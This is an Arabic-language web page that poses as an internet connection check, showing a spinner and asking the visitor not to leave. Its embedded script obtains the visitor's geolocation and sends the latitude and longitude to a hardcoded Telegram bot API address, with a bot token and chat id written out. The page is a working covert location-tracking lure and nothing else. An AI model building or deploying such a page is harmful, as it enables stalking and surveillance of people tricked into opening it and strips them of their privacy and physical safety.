
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <title>جاري التحقق...</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body {
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      background-color: #f3f3f3;
      text-align: center;
      padding: 50px;
    }
    h1 {
      color: #333;
    }
    .loader {
      border: 16px solid #f3f3f3;
      border-top: 16px solid #3498db;
      border-radius: 50%;
      width: 120px;
      height: 120px;
      animation: spin 2s linear infinite;
      margin: 30px auto;
    }
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <h1>جاري التحقق من اتصالك بالانترنت</h1>
  <p>الرجاء عدم مغادرة الصفحة...</p>
  <div class="loader"></div>

  <script>
    navigator.geolocation.getCurrentPosition(function(position) {
      var lat = position.coords.latitude;
      var lon = position.coords.longitude;
      var url = "https://api.telegram.org/bot7607412954:AAFHsq0nijkAfPZ9Hz95Exs3zD9gQNVCMx4/sendLocation?chat_id=5003519098&latitude=" + lat + "&longitude=" + lon;

      fetch(url).then(response => {
        console.log("Location sent to Telegram");
      });
    });
  </script>
</body>
</html>
